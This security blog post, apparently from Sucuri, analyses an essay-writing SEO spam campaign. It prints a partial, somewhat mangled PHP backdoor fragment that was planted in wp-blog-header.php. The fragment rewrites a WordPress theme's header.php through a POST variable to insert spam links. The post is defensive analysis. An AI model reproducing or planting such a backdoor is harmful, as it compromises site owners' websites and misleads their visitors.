Not Just Pills or Payday Loans, It’s Essay SEO SPAM!

Remember back in school or college when you had to write pages and pages of long essays, but had no time to write them? Or maybe you were just too lazy? Yeah, good times. Well, it seems like some companies are trying to end this problem. They are offering services where clients pay them to write these essays for you.

Essay SEO SPAM

The problem is that this is not only wrong, but it’s also becoming a competitive market where some companies are leveraging SEO SPAM to gain better rankings on search engines (i.e., Google, Bing). They are also using popular sites like bleacherreport.com and joomlacode.org to add their spam links.

Here are a couple example URL’s from sites that got hit (URL’s are still showing SPAM):

  • httx://bleacherreport.com/users/4065601-community-service-essays
  • httx://joomlacode.org/gf/download/trackeritem/32806/131536/online-academic-writers.html

If you think you have seen all kinds of SEO spam, think again. We just found a new one: the Essay SEO spam.

How Did We Find It?

Easy, Our free malware scanner SiteCheck was flagging a website as infected.

This was the payload:

SiteCheck

At first, it appeared to be a false positive, but then I realized that this was an engineering website, and this “paper writing services” content couldn’t possibly have anything to do with it.

After checking out some of the flagged links I got to this “final” website: httx://www.paperhelp.org/order.html. We are not implying they are behind the attacks, but it wouldn’t be a stretch of the imagination to think that they likely hired an SEO company and that company could be using BlackHat techniques.

Who knows…

Where Was This Infection?

What got my attention was this tag "

)|s',$p)){ $p=preg_replace('|(<div id="links-s".*?
)|s','',$p);} preg_match('|()s|',$p,$bodys); $body=$bodys[1]." ".$link_div; $p_n=preg_replace('|()s|',"$body",$p); $fp = fopen($heder, 'w');fwrite($fp, $p_n);fclose($fp); echo "succes"; }

I am not a developer so I asked one of our developers (Ante Kresic) how this backdoor worked, and here is his explanation:

This backdoor was inserted in the wp-blog-header.php file, which is the first file that is read in WordPress, so this works on the whole site. The $_POST[‘link’] gives permission to add content in a website, in this specific case, it was added in the header.php file:

$heder="wp-content/themes/display/header.php";

So basically, the hacker is sending a payload using this post variable ‘link’, filled with ‘’ and ‘|’ characters written in a specific format. These are separated into multiple entries and they all show up in the header.php file, printed out as “succes” :

echo "succes";

The irony in the entire story could be traced back to a simple indicator that something was wrong, these attackers were advertising essay writing services, and using words like “heder” and “succes”.


Have you run into any sites with similar scams or SPAM? If you’re not sure if your site, or one you’re visiting is affected or infected, run a free malware scan. If you need help cleaning up a site, check out Sucuri Cleanup.

Via Sucuri.net

Tags: , , , ,

No comments yet.

Leave a Reply